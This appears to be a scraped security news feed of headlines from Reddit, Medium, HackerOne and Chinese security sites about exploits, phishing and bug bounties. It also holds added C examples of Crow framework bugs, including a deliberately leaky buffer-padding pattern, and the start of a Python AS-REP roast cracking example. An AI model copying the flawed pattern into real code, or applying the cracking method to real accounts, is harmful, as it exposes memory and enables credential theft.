    submitted by /u/dmchell [link] [comments]
    Ever wondered how AV knows your new beacon is malicious?
    submitted by /u/Diesl [link] [comments]
    evilgophish Now Supports SMS Smishing Campaigns
    Up until now, there was no open-source phishing framework that supports SMS campaigns by default. submitted by /u/edreatingmonkey [link] [comments]

    Is there a particular way to search ODCrawler or are mostly dead links to be expected?
    For example, I was trying to find ODs with Curb Your Enthusiasm and there's literally nothing, which is very surprising to me. Is just searching the show title not a good way to go about it, or what? Or is Curb not that popular and I should just accept that no ODs have it? submitted by /u/Seahearse01 [link] [comments]

    TRY HACK ME: Threat Intelligence Tools Write-Up
    Task 1 Room Outline- Continue reading on Medium »

    How I was able to find 150+ vulnerable applications to CVE-2022–26134 | A Zero-day RCE
    From shodan dorks to filter out vulnerable hosts. Continue reading on Medium »
    Bug Bounty | Detailed definition of Bug Bounty by CyberHacks
    If you’re looking to have a rewarding job, with the ability to work in an exciting industry. Continue reading on Medium »
    SSRF IN-DEPTH…
    Hello mates, welcome back to another of my blogs. Continue reading on Medium »
    OWASP Top-10 [2021] for Bug Bounty Hunters (Day-5)
    Hello geeks, it’s Selim back here with another interesting article. Continue reading on Medium »
    Escalating SSTI to Reflected XSS using curly braces { }
    SSTI -> Self XSS -> RXSS Continue reading on Medium »

    SecWiki News 2022-09-24 Review
    No news updated today~ For more recent articles, visit SecWiki

    How to exploit a stored XSS vulnerability on DVWA — StackZero
    This is a walkthrough in exploiting stored XSS on DVWA, with the side effect of letting a deeper understanding of that vulnerability. Continue reading on InfoSec Write-ups »
    Understanding the NMAP methodology — Part 2
    No content preview

    Where are the big bucks?
    Right now I'm doing alright in the space, but it sure as hell isn't Silicon Valley. How do you maximize your income in this field? Become very, very skilled at a niche issue? Start your own company? submitted by /u/FAlady [link] [comments]
    iPhone event logs from iTunes backup is possible?
    Hello friends, generally I'm using the Screen Time function like an event viewer to give me an idea of my app usage, but it only shows 2-3 weeks back and I want to see more than that, like 5 months ago if possible. From my research, I found that the KnowledgeC.db file has a wide range of an iPhone's event logs, but I'm not sure whether an encrypted iTunes backup will give me this KnowledgeC.db file. If I could gain access to that file through an iTunes backup, I'm thinking of using iLEAPP to parse the iPhone data. The other question is: how long does the KnowledgeC.db file actually hold these logs? Can I see 5 months back from now? If the answer is "no", what are my options? Basically, I want to see all of my iPhone's app usage data, device locks/unlocks and connected/plugged-in device info from 5 months ago. I'm waiting for your valuable replies, thank you very much in advance... submitted by /u/Sad-Lemon-1997 [link] [comments]
    Has anyone here worked E-Discovery or is a CFE?
    I'm applying to internships for e-discovery and fraud analysis, with a background in network security, but I'm studying computer forensics for my Bachelor's, so I really want to utilize my coursework to build a career off of. Moving on from retail, I want to find my footing and land an internship within the CF field. submitted by /u/OhmyMary [link] [comments]

    Snapshot fuzzing with WTF
    A few months back I was fuzzing a target with winafl but I wasn't satisfied with the result. My target wasn't working well while… Continue reading on Medium »

    Reproducing the Cobalt Strike RCE vulnerability CVE-2022-39197
    Vulnerability summary: the flaw exists in Cobalt Strike's Beacon component and may allow an attacker to set a malformed username in the Beacon configuration, triggering XSS and leading to remote code execution on the CS team server. Preparation, environment information: 192
    OSCP Vulnhub target notes: bravery walkthrough
    Target URL https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/ Install the target, open Kali and scan for live hosts: nmap -sP 192.168.160.0/24 Target IP 192.168.160.128 Scan ports and services: ./nmapAuto -H 192.168.160.128 -t All PORT STATE SERVICE 22/tcp open s
    How does AI get on the road to smarter intelligence?
    A new Stanford University study shows that AI systems can be helped to become smarter by asking questions that look rather silly.

    Establishing Persistence via Shortcut Links
    Welcome offensive ninjas, when doing red teaming or internal penetration testing, we must maintain local access as stealthy as possible… Continue reading on Medium »

    Cable Haunt (Vulnerability)
    Article URL: https://en.wikipedia.org/wiki/Cable_Haunt Comments URL: https://news.ycombinator.com/item?id=32959731 Points: 3 # Comments: 0

    Improving the hunting of exposed information of our organization through a free account of…
    The following information is for educational purposes only; the author is not responsible for the use given to the information provided in… Continue reading on Medium »
    Arbitrary File Corruption: End - to - End Encrypted Messaging Application
    In this write-up, I’ll tell you how I was able to Exfiltrate Database and Sandbox Files on End-to-End Encrypted Messaging Application. Continue reading on Medium »
    WAF bypasses via 0days
    based on findings from a live hacking event Continue reading on Medium »
    My First Valid Bug “Bypass the Admin Panel”
    Hey everyone, I am Digant Prajapati. Cyber Security Enthusiast and currently focusing on bug bounty💸. Continue reading on Medium »
    List of Cybersecurity YouTubers for Beginners
    This is a list of top 10 cybersecurity-related YouTube channels that I found extremely practical for beginners. Continue reading on Medium »
    My First XSS
    Hey everyone, I am SYRINE. Cyber Security Enthusiast, eJPT Certified, and currently focusing on bug bounty. Continue reading on Medium »
    Bypassing CSRF Protection (II)
    Hi, My name is Hashar Mujahid and in this blog, we will talk about some techniques to bypass the csrf protection. Continue reading on InfoSec Write-ups »

    Geolocation #4 — Wagner vs Rosgvardia
    On 16/09/2022, Twitter user @Ukrainene tweeted the following video consisting of an argument and fight between a member of Wagner PMC and… Continue reading on Medium »
    Challenge: so where is it?
    Challenge proposed on the OSINT FR Discord. The solution follows below. Continue reading on Medium »
    Challenge: 3 levels
    Challenge proposed on the OSINT FR Discord. The solution follows below. Continue reading on Medium »
    Challenge: I don't speak Chinese
    Challenge proposed on the OSINT FR Discord. The solution follows below. Continue reading on Medium »
    Challenge: Street Art
    Challenge proposed on the OSINT FR Discord. The solution follows below. Continue reading on Medium »
    Challenge: русский-вызов (Russian challenge)
    Challenge proposed on the OSINT FR Discord. The solution follows below. Continue reading on Medium »

    Malware Targeting dYdX Crypto Exchange
    submitted by /u/louis11 [link] [comments]
    CVE-2022-35256 - HTTP Request Smuggling in NodeJS
    submitted by /u/VVX7 [link] [comments]
    Tool for Sizing Solidity Smart Contract Audits
    submitted by /u/kruksym [link] [comments]
    How to secure against forced browsing info disclosures
    submitted by /u/pm_me_security_jobs [link] [comments]
    ModSecurity WAF bypasses via 0days
    submitted by /u/Gallus [link] [comments]
    metamaska - malevolent payload classifier
    submitted by /u/c0daman [link] [comments]
    Passkeys - an opinionated, “quick-start” guide to using passkeys
    submitted by /u/Gallus [link] [comments]
    BigQuery SQL Injection Cheat Sheet
    submitted by /u/Gallus [link] [comments]

    Offensive Security Learn Together
    Hey guys! I am looking for people who are into offensive/defensive security and want to level up and gain knowledge together by doing CTFs, boxes, and OSCP-related practice. I just want to add some friends so that we can get motivation from each other's daily activity and, of course, healthy competition. If you are interested, leave your Discord so I can add you. submitted by /u/PanDosKi [link] [comments]
    There's a ton of blogs etc. over the years showing how to use bettercap, Alfa antennas etc., but how feasible is it to crack WiFi networks nowadays using these tools, aside from old WPA networks? Am I right in thinking that the only folks who can do this successfully are people who invest in GPU power?
    submitted by /u/HamburgersNHeroin [link] [comments]
    Steal WiFi Login for Enterprise Networks
    submitted by /u/tbhaxor [link] [comments]

    [CVE-2022-35949]: undici.request vulnerable to SSRF using absolute / protocol-relative URL on pathname
    Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1663788 - Bounty: $1200
    CVE-2022-35948: CRLF Injection in Nodejs undici via Content-Type
    Internet Bug Bounty disclosed a bug submitted by happyhacking123: https://hackerone.com/reports/1664019 - Bounty: $600
    CVE-2022-38362: Apache Airflow Docker Provider <3.0 RCE vulnerability in example dag
    Internet Bug Bounty disclosed a bug submitted by happyhacking123: https://hackerone.com/reports/1671140 - Bounty: $4000
    com.basecamp.bc3 Webview Javascript Injection and JS bridge takeover
    Basecamp disclosed a bug submitted by fr4via: https://hackerone.com/reports/1343300 - Bounty: $1210

    A technical analysis of the leaked LockBit 3.0 builder
    submitted by /u/CyberMasterV [link] [comments]
    What is the difference between FTK and AD Lab?
    What is the difference between FTK and AD Lab? submitted by /u/Least_Lab375 [link] [comments]

    SecWiki News 2022-09-23 Review
    Research on cybersecurity information extraction based on unified structure generation, by ourren; A brief discussion of vulnerability management in in-house (customer-side) organizations, by ourren; Little-known stories behind encrypted-traffic security, by ourren; Revealing the general workflow top hunters use to dig into main applications, by 蓝色淡风. For more recent articles, visit SecWiki

    Cybercrime case analysis: scalping train tickets (part 52)
    Using ticket-grabbing software to scalp train tickets for a profit of 2,000 yuan constituted the crime of ticket scalping and drew a sentence of six months' imprisonment.
    FreeBuf Morning Report | 17-year-old suspected of being behind the GTA6 leak; Meta accused of secretly tracking iPhone users
    London police reported that they had arrested a 17-year-old hacker in Oxfordshire in connection with a cyberattack, said he remains in custody, and released no further details.
    FreeBuf Weekly | A 15-year-old Python flaw could affect more than 350,000 projects; Indonesia passes a data privacy law
    We have summarized and recommended this week's hot news, security incidents, good reads and handy tools, so you won't miss any of the week's highlights!
    Browser extensions: more dangerous than you think
    Using the most common families of malicious extensions as examples, this article uncovers the hidden threats of browser extensions.
    "羊了个羊" (Sheep a Sheep) has been under constant hacker attack!
    Since launch, 羊了个羊 has suffered continual hacker attacks that crashed the game servers for long stretches, seriously degrading the player experience.
    Researchers disclose a critical, now-patched vulnerability in Oracle Cloud Infrastructure
    Researchers found a critical Oracle Cloud Infrastructure (OCI) vulnerability, which has now been fixed.
    Software supply chain security trends seen through recent US and EU regulation
    Foreword: the US and the EU have both recently issued new supply-chain-security legislation requiring vendors to assess the security of the digital products in their supply chains, aiming to protect supply chains and prevent a repeat of incidents such as SolarWinds. Both the US and the EU bills mention software security testing and software bills of materials (SBOM), which means that through mandatory cybersecurity regulation, enterprises must improve the security of their digital products by disclosing SBOMs, running source-code security testing and similar measures in order to keep selling and supplying those products. On September 14 the White House
    A Python vulnerability unpatched for 15 years may affect more than 350,000 projects; check now
    A Python module contains a security vulnerability left unfixed for 15 years that could allow more than 350,000 open-source projects to be exploited.
    知物由学 | Offence and defence between AI and the black market: a detailed look at detecting adversarial text images
    Introduction: as OCR systems' recognition ability improves, more and more underground operators specialize in defeating OCR. How can AI resist the black market's adversarial text images? This article shares common algorithms for similarity-feature training and introduces some representative work among them.
    Practical use of Lua scripts in Redis transactions
    Anyone who has used Redis transactions knows they are implemented by packaging multiple commands into a single isolated operation: all commands in the transaction execute in order, and execution is not interrupted by command requests from other clients. Either all commands in the transaction are executed or none are (an atomic operation). However, a command failing for business reasons does not stop the subsequent commands from executing, and commands that have already executed cannot be rolled back. To get MySQL-style transaction handling you can use a Lua script, in which
    Explore | Helping crack cases: is it really that mysterious?
    Big-data anti-vice enforcement: is it really that mysterious? This article explores how big-data technology helps crack cases in the digital-economy era!
    Why do hackers attack trading platforms but not Alipay?
    First, an interesting story: the year before last, in 2017, there was an armed robbery in Hangzhou. Two cousins agreed to come to Hangzhou to rob, and travelled a long way to get there; one of them even flew in from Yunnan. Around Fengqi Road near West Lake they robbed three convenience stores at knifepoint, netting a total of just 1,800 yuan in cash. Indeed, thanks to Alipay, a city like Hangzhou has almost become a cashless society, which has indirectly cut off robbers' livelihood. Have you ever wondered: why doesn't Alipay get hacked

    How I Found Multiple SQL Injections in 5 Minutes in Bug Bounty
    No content preview
    Bypassing CSRF Protection (II)
    No content preview

    utilman.exe — Exploring the Ease of Access feature
    As you may already be familiar, utilman.exe, or Utility Manager, is an operating-system feature that lets you perform the… Continue reading on 100security »

    Crow HTTP framework use-after-free
    (Collaborative post by hebi and Gynvael Coldwind) Crow is an asynchronous C++ HTTP/WebSocket framework for creating "flask-like" web services. In early August we discovered a pretty interesting use-after-free vulnerability. Since Crow takes advantage of the Asio library for asynchronous input/output operations, analysis of this vulnerability took a few long evenings since the cause was split between multiple interweaved tasks and callbacks. Eventually we traced the root cause to an interesting mismatch between two layers of code, one of which - the HTTP parser - was supporting HTTP pipelining (or rather was agnostic towards it, which resulted in pipelining being inadvertently supported), while the other - HTTP server logic - was not designed to take HTTP pipelining into account. This r…
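The parser/server mismatch described above, as an added example that is not Crow's code: one TCP read can carry several complete HTTP requests, and a parser that walks the buffer request by request (honouring Content-Length) finds all of them, while a server loop that assumes one request per read handles only the first and leaves the rest in a buffer it is about to reset or free. The wire buffer (two complete requests plus the start of a third) is constructed, and the function names are assumptions for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Case-insensitive compare of n bytes (HTTP header names are case-insensitive). */
static int ieq(const char *a, const char *b, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i]))
            return 0;
    return 1;
}

/* Value of Content-Length inside head[0..head_len), or 0 if the header is absent. */
static size_t content_length(const char *head, size_t head_len) {
    static const char key[] = "Content-Length:";
    size_t klen = sizeof key - 1;
    for (size_t i = 0; i + klen <= head_len; i++)
        if (ieq(head + i, key, klen))
            return (size_t)strtoul(head + i + klen, NULL, 10);
    return 0;
}

/* Length of the complete request starting at buf[off], or 0 if the request at
 * that offset has not been fully received yet (headers or body still missing). */
size_t next_request_len(const char *buf, size_t len, size_t off) {
    for (size_t i = off; i + 4 <= len; i++) {
        if (memcmp(buf + i, "\r\n\r\n", 4) != 0)
            continue;                                   /* not the end of headers */
        size_t hend = i + 4;
        size_t body = content_length(buf + off, hend - off);
        if (body > len - hend)
            return 0;                                   /* body incomplete */
        return hend + body - off;
    }
    return 0;
}

/* Pipelining-aware driver: counts the complete requests in buf[0..len) and
 * stores in *consumed the offset of the first byte not belonging to one
 * (a trailing partial request is left for the next read to complete). */
size_t split_requests(const char *buf, size_t len, size_t *consumed) {
    size_t count = 0, off = 0, n;
    while (off < len && (n = next_request_len(buf, len, off)) > 0) {
        off += n;
        count++;
    }
    *consumed = off;
    return count;
}

int main(void) {
    /* Constructed single read: two complete pipelined requests plus the start of a third. */
    static const char wire[] =
        "GET /a HTTP/1.1\r\nHost: x\r\n\r\n"
        "POST /b HTTP/1.1\r\nHost: x\r\nContent-Length: 5\r\n\r\nhello"
        "GET /c HTTP/1.1\r\nHos";
    size_t len = sizeof wire - 1, used = 0;

    size_t n = split_requests(wire, len, &used);
    printf("pipelining-aware loop: %zu complete requests, %zu of %zu bytes consumed\n",
           n, used, len);

    /* A one-request-per-read server stops after the first request; everything
     * after it is still sitting in the buffer the connection is about to reset. */
    size_t first = next_request_len(wire, len, 0);
    printf("one-request-per-read server: handles 1 request, leaves %zu bytes behind\n",
           len - first);
    return 0;
}
```

The check a tester can run against a server is the same one the driver performs: send two requests in one write and see whether the second is ever answered, and whether answering it reuses state the first request already released.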
    Crowbleed (Crow HTTP framework vulnerability)
    (Collaborative post by Gynvael Coldwind and hebi) Crow is an asynchronous C++ HTTP/WebSocket framework for creating "flask-like" web services. While analyzing another vulnerability we found a Cloudbleed-like information disclosure bug in the code path responsible for serving static files. Technically no special action on the attacker's side was required: it was enough to request a static file smaller than 16KB and the server would send the file back padded with uninitialized stack content (up to 16KB). The vulnerability was reported mid-August and fixed within 6 days. CVSS, CVE, etc. Human-readable details are in the next section. CVE: CVE-2022-38668 CVSS 3.1: 5.3 Medium (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) [as originally reported] CVSS 3.1: 7.5…
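The padding bug described above, as an added example that is not Crow's code: a 16 KiB fixed-size buffer, a file shorter than the buffer, and a send path that uses the buffer size instead of the number of bytes read, beside the corrected version. The file contents, the 'S' filler standing in for stale stack data, and the function and buffer names are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

#define CHUNK 16384   /* the 16 KiB read size mentioned in the write-up */

/* Stand-in for a file read: copies up to buf_len bytes of the (constructed)
 * file into buf and returns the number of bytes actually copied. */
static size_t read_file_into(const unsigned char *file, size_t file_len,
                             unsigned char *buf, size_t buf_len) {
    size_t n = file_len < buf_len ? file_len : buf_len;
    memcpy(buf, file, n);
    return n;
}

/* Leaky pattern: the read count is discarded and the whole chunk is sent, so a
 * file shorter than CHUNK goes out padded with whatever the buffer already
 * held. 'S' stands in for stale stack contents so the run is deterministic.
 * Returns the number of bytes written to out (caller supplies CHUNK bytes). */
size_t serve_static_leaky(const unsigned char *file, size_t file_len,
                          unsigned char *out) {
    unsigned char buf[CHUNK];
    memset(buf, 'S', sizeof buf);            /* constructed stand-in for uninitialised stack */
    (void)read_file_into(file, file_len, buf, sizeof buf);
    memcpy(out, buf, sizeof buf);            /* bug: sizeof buf, not the bytes read */
    return sizeof buf;
}

/* Fixed pattern: send exactly as many bytes as were read. */
size_t serve_static_fixed(const unsigned char *file, size_t file_len,
                          unsigned char *out) {
    unsigned char buf[CHUNK];
    memset(buf, 'S', sizeof buf);
    size_t n = read_file_into(file, file_len, buf, sizeof buf);
    memcpy(out, buf, n);
    return n;
}

/* Tester's check: bytes in a response body beyond the file's known length. */
size_t padding_bytes(size_t resp_len, size_t file_len) {
    return resp_len > file_len ? resp_len - file_len : 0;
}

int main(void) {
    static const unsigned char file[] = "<html>hello</html>";  /* constructed 18-byte file */
    static unsigned char out[CHUNK];
    size_t file_len = sizeof file - 1;

    size_t sent = serve_static_leaky(file, file_len, out);
    printf("leaky: %zu bytes sent for a %zu-byte file, %zu bytes of padding, byte[%zu]='%c'\n",
           sent, file_len, padding_bytes(sent, file_len), file_len, out[file_len]);

    sent = serve_static_fixed(file, file_len, out);
    printf("fixed: %zu bytes sent, %zu bytes of padding\n",
           sent, padding_bytes(sent, file_len));
    return 0;
}
```

Against a live server the equivalent check is to fetch a small static file whose length is known, compare Content-Length and body size with that length, and inspect anything beyond it; on a real stack the padding is not a fixed filler but whatever earlier requests left behind.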

    Open Redirect on www.redditinc.com via `failed` query param
    Reddit disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1257753 - Bounty: $500
    Content injection in Jira issue title enabling sending arbitrary POST request as victim
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1533976 - Bounty: $8690
    Unauthenticated IP allowlist bypass when accessing job artifacts through gitlab pages at `{group_id}.gitlab.io`
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1591412 - Bounty: $1990
    getUsersOfRoom discloses users in private channels
    Rocket.Chat disclosed a bug submitted by gronke: https://hackerone.com/reports/1410357
    Rocket.chat user info security issue
    Rocket.Chat disclosed a bug submitted by mikolajczak: https://hackerone.com/reports/1517377
    Message ID Enumeration with Regular Expression in getReadReceipts Meteor method
    Rocket.Chat disclosed a bug submitted by gronke: https://hackerone.com/reports/1377105
    API route chat.getThreadsList leaks private message content
    Rocket.Chat disclosed a bug submitted by gronke: https://hackerone.com/reports/1446767
    NoSQL-Injection discloses S3 File Upload URLs
    Rocket.Chat disclosed a bug submitted by gronke: https://hackerone.com/reports/1458020
    getRoomRoles Method leaks Channel Owner
    Rocket.Chat disclosed a bug submitted by gronke: https://hackerone.com/reports/1447440
    TOTP 2 Factor Authentication Bypass
    Rocket.Chat disclosed a bug submitted by gronke: https://hackerone.com/reports/1448268
    Message ID Enumeration with Action Link Handler
    Rocket.Chat disclosed a bug submitted by gronke: https://hackerone.com/reports/1406953
    REST API gets `query` as parameter and executes it
    Rocket.Chat disclosed a bug submitted by paulocsanz: https://hackerone.com/reports/1140631
    Unintended information disclosure in the Hubot Log files
    Rocket.Chat disclosed a bug submitted by rolfzur: https://hackerone.com/reports/1394399
    Bypass local authentication (PIN code)
    Rocket.Chat disclosed a bug submitted by dago_669: https://hackerone.com/reports/1126414
    getUserMentionsByChannel leaks messages with mention from private channel
    Rocket.Chat disclosed a bug submitted by gronke: https://hackerone.com/reports/1410246
    It is possible to elevate privileges for any authenticated user to view permissions matrix and view Direct messages without appropriate permissions.
    Rocket.Chat disclosed a bug submitted by garretby: https://hackerone.com/reports/917946
    Persistent CSS injection with marked markdown parser in Rocket.Chat
    Rocket.Chat disclosed a bug submitted by danieljpp: https://hackerone.com/reports/1401268
    Regex account takeover
    Rocket.Chat disclosed a bug submitted by ghaem51: https://hackerone.com/reports/1581059
    XSS in ZenTao integration affecting self hosted instances without strict CSP
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1542510 - Bounty: $13950
    DLL Search-Order Hijacking Vulnerability in work-64-exe-v7.16.3-1.exe
    8x8 disclosed a bug submitted by is-: https://hackerone.com/reports/1519437

    Tool Release – Project Kubescout: Adding Kubernetes Support to Scout Suite
    submitted by /u/digicat [link] [comments]
    Making HTTP header injection critical via response queue poisoning
    submitted by /u/albinowax [link] [comments]
    Raspberry Robin’s Roshtyak: A Little Lesson in Trickery
    submitted by /u/stashing_the_smack [link] [comments]
    Bypassing FileBlockExecutable in Sysmon 14.0: A Lesson In Analyzing Assumptions
    submitted by /u/darronofsky [link] [comments]
    Exploiting Web3’s Hidden Attack Surface: Universal XSS on Netlify’s Next.js Library
    submitted by /u/Mempodipper [link] [comments]
    Breaking Bitbucket: Pre Auth Remote Command Execution (CVE-2022-36804)
    submitted by /u/Mempodipper [link] [comments]
    Dissecting and MITMing Duo Device Health App
    submitted by /u/sanitybit [link] [comments]
    AWS IAM Identity Center Access Tokens are Stored in Clear Text and No, That’s Not a Critical…
    submitted by /u/csanders_ [link] [comments]

    Vetting mobile forensic options
    Does anyone know if there is something that can be previewed while connected to a mobile device and create a logical image from it? The challenge is not to have it read from the backup, and I don't want a full physical or logical image. Is there such a product? submitted by /u/hw60068n [link] [comments]
    How to recover text/metadata from malware doc
    Have a requirement to be able to extract data from a malware-ridden PDF, Word, Excel etc. file. Basically we would want to retrieve the important data like text and metadata and leave behind everything else. submitted by /u/InfosecDub [link] [comments]
    Seeking To Buy Replacement UFED Device Adapter.
    Hi all! Looking to buy a UFED Device Adapter. The neato little USB one with the LAN port on it and whatnot. Can pay quite a few dollars. Let me know, would love to hear from you <3 submitted by /u/BrokenToasterOven [link] [comments]

    How to Fix Google Ads Disapproved Due to Malicious or Unwanted Software
    It's estimated that 98.5% of sites that advertise use Google Ads to generate revenue and bring in traffic. That's a hefty number of websites that leverage the popular platform to publish and serve ads. And while most webmasters are keenly aware that a hack can significantly impact a site's revenue and organic rankings, malicious code or software can also affect your ability to run ads on Google and other advertising platforms. Your Google Ads must be trustworthy and relevant, and this policy applies to your website as well. Continue reading How to Fix Google Ads Disapproved Due to Malicious or Unwanted Software at Sucuri Blog.

    How I Found Multiple SQL Injections in 5 Minutes in Bug Bounty
    Hi everybody, SQL Injection is one of the most critical vulnerabilities that can be found in web applications I will show you today how I… Continue reading on InfoSec Write-ups »
    Immunefi Raises $24m for Series A to Secure Web3
    Today, we’re announcing that we’ve raised $24m for our Series A round, led by Framework Ventures and joined by other investors like… Continue reading on Immunefi »
    Instagram Bug : $45,000 awarded to an Indian Student
    An Indian Student found a bug in Instagram Continue reading on Medium »

    What Is Data Exfiltration? MITRE ATT&CK® Exfiltration Tactic | TA0010
    submitted by /u/Successful_Mix_8988 [link] [comments]
    Malicious OAuth applications used to compromise email servers and spread spam
    submitted by /u/SCI_Rusher [link] [comments]

    Books, Software, and Other Stuff
    https://files.dog http://204.16.243.178 submitted by /u/ilikemacsalot [link] [comments]

    SecWiki News 2022-09-22 Review
    Docker image of a threat-intelligence analysis toolset, by ourren; Learning phar deserialization, by SecIN社区; rengine: a platform for automated information gathering, by ourren. For more recent articles, visit SecWiki

    AWS control tower — the best way to govern multi-account environments
    Anyone who has worked in the cloud knows how quickly this environment can increase in complexity as more and more workloads get migrated… Continue reading on InfoSec Write-ups »
    Write-up: JWT authentication bypass via jwk header injection @ PortSwigger Academy
    This write-up for the lab JWT authentication bypass via jwk header injection is part of my walk-through series for PortSwigger’s Web… Continue reading on InfoSec Write-ups »
    OSINT Information Gathering with Informer
    No content preview
    Understanding the NMAP methodology — Part 1
    No content preview
    Try Hack Me: Basic Pentesting Walkthrough
    No content preview
    Try Hack Me: Intro to Digital Forensics Walkthrough
    No content preview
    How I hacked an exam portal and got access to 10K+ users data including webcams
    No content preview

    Tarfile: Exploiting the World with a 15-Year-Old Vulnerability
    Article URL: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/tarfile-exploiting-the-world.html Comments URL: https://news.ycombinator.com/item?id=32939583 Points: 2 # Comments: 0
    Ask HN: User wants to disclose a vulnerability. What next?
    "Hi team, I found a vulnerability in your website and want to disclose it to you. Let me know if you have any active bug bounty program or is there any compensation for reporting vulnerabilities?" What's the correct course of action for a software team, or management, when a user asks to disclose a vulnerability they've found? Comments URL: https://news.ycombinator.com/item?id=32938408 Points: 4 # Comments: 3

    Road To Nowhere — Geolocating a village in Myanmar from satellite imagery
    Solving this Hacktoria challenge the hard way. Continue reading on Medium »
    Learn OSINT(Reconnaissance) for ethical hacking and penetration testing
    OSINT is a critical skill to understand for any hacker and pentester. In this course, you will learn about OSINT (reconnaissance) focused… Continue reading on Medium »

    Watch Out for UUIDs in Request Parameters
    The Plugin: https://github.com/GeoffWalton/UUID-Watcher Some time ago on the TrustedSec Security Podcast, I shared a Burp Suite plugin I developed to hunt Insecure Direct Object Reference (IDOR) issues where applications might be using UUIDs or GUIDs (unique identifiers) as keys, assuming discovery attacks will not be possible. The plugin produces a report that helps identify which... The post Watch Out for UUIDs in Request Parameters appeared first on TrustedSec.

    Hilarious problem: the attempt to load "\x" as raw bytes isn't; which layer does this?
    I just realized that I not only have to get the offsets right, I also need to get the byte strings read correctly as bytes. This isn't documented as much as I would expect and is a major catch for doing this. Any thoughts? submitted by /u/FinanceAggravating12 [link] [comments]

    The Five Stages of the Red Team Methodology
    Red Teaming is a multi-layered cyberattack simulation designed to test the efficiency of an organization’s security controls. Continue reading on Medium »

    Experience using high-defense services against DDoS | FreeBuf in-house security group discussion
    High-defense servers and high-defense IPs are often considered good options; how do the two differ? Is there such a thing as a high-defense service that cannot be taken down?
    FreeBuf Morning Report | South Korea's War Memorial hit by hackers; China Unicom responds to being placed on the US FCC's security-threat list
    The War Memorial of Korea, which sits under the South Korean Ministry of National Defense, was recently attacked by unidentified hackers, but no military data was leaked as a result.
    Attacks on open-source code repositories up sevenfold in three years
    Attackers plant malicious code in open-source software components that are distributed downstream, endangering many applications that businesses and consumers depend on.
    Two in five US consumers had data stolen, and businesses cannot escape the attackers' "poisonous hand" either
    Over the past year, roughly two in five US consumers had their personal information stolen, leaked or misused.
    [From basics to depth, building a solid foundation] Ways to exploit WebSocket
    Every visit seems to set up this websocket connection; I learned what it was when studying networking, but wasn't clear whether there were ways to exploit it, so I looked into it.

    Security research on the erlang-distribution-protocol
    Author: lxraa. This is a contributed article; Seebug Paper looks forward to your submissions, and every accepted one receives a gift! Submission mailbox: paper@seebug.org. Foreword: because part of our company's business is implemented in Erlang, and there is little research on Erlang security on the Chinese-language internet, I did some research combining code and public material to understand the security issues of Erlang applications. This article is the part of that Erlang security research project that targets the Erlang distribution protocol...
    Analysis of CVE-2022-22963, a SpEL injection vulnerability in Spring Cloud Function
    Author: xxhzz@星阑科技PortalLab. Original link: https://mp.weixin.qq.com/s/3DECgzKcovoCQcdZLGXCzA Foreword: after researching and analysing CVE-2022-22980, the Spring Data MongoDB SpEL expression injection vulnerability, I recalled a SpEL expression injection vulnerability in Spring Cloud Function that existed before spring4shell broke, ...
    Analysis of CVE-2022-34916, a remote code execution vulnerability in Apache Flume
    Author: xxhzz@星阑科技PortalLab. Original link: https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ Project introduction: Apache Flume is distributed, reliable software for efficiently collecting, aggregating and moving large amounts of log data. It has a simple, flexible architecture based on streaming data flows, tunable reliability mechanisms with many failover and recovery mechanisms, and is robust and fault-tolerant. It uses a...

    FilelessRemotePE: Loading fileless remote PE from URI to memory
    submitted by /u/sanitybit [link] [comments]
    Giving JuicyPotato a second chance: JuicyPotatoNG
    submitted by /u/splinter_code [link] [comments]
    How we Abused Repository Webhooks to Access Internal CI Systems at Scale
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]
    Finding a RCE and a Docker escape in OneDev
    submitted by /u/monoimpact [link] [comments]
    Intent Summit 2022 - The Security Research Summit. For researchers. By researchers. CFP now open!
    submitted by /u/jat0369 [link] [comments]
    Exploiting a Seagate service to create a SYSTEM shell (CVE-2022-40286)
    submitted by /u/sanitybit [link] [comments]
    Practical Attacks against NTLMv1
    submitted by /u/0xdea [link] [comments]
    BGGP3 has completed! 34 entries, 23 writeups, and 3 CVE's.
    submitted by /u/netsecfriends [link] [comments]
  • Open

    OSINT: Gaining Knowledge From Instagram With Open Source Tools And How To Prevent It From Happening…
    Hey Everyone! So recently I’ve been receiving a lot of messages on my Instagram account. They’re asking me to visit a website in their bio… Continue reading on Medium »
  • Open

    Add products to any livestream.
    TikTok disclosed a bug submitted by datph4m: https://hackerone.com/reports/1654657 - Bounty: $3000
    Create product discounts of any shop
    TikTok disclosed a bug submitted by datph4m: https://hackerone.com/reports/1571578 - Bounty: $4500
    size_t-to-int vulnerability in exFAT leads to memory corruption via malformed USB flash drives
    PlayStation disclosed a bug submitted by theflow0: https://hackerone.com/reports/1340942 - Bounty: $10000
    DOS: out of memory from gif through upload api
    Mattermost disclosed a bug submitted by catenacyber: https://hackerone.com/reports/1620170 - Bounty: $150
  • Open

    AS-Roasting and Hashcat
    When running AS-Roasting, we get a session key encrypted with the user's password hash (please correct me if I'm wrong). Now, the question is how hashcat knows which guessed password hash is the right one? Since it's only a random session key, how does hashcat identify a valid output? Thanks! submitted by /u/theresilientturtle [link] [comments]
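    The question above is answered by the structure of the etype 23 (RC4-HMAC, RFC 4757) enc-part: the AS-REP carries an HMAC-MD5 checksum next to the ciphertext, so a cracker derives the key from each guess (NT hash = MD4 of the UTF-16LE password), decrypts, recomputes the checksum and compares; the random session key inside never has to be known. The following is an added example written for this page, not code from the post or from hashcat. The principal, password and enc-part body are constructed, and the $krb5asrep$23$principal:checksum$ciphertext layout follows the line Impacket's GetNPUsers emits for hashcat mode 18200. AES etypes (17/18) use a different key derivation and are not covered here.

```python
"""How a cracker checks an AS-REP roast guess (etype 23, RC4-HMAC, RFC 4757)."""
import hashlib
import hmac
import os
import struct
from typing import Optional, Tuple

_MASK = 0xFFFFFFFF
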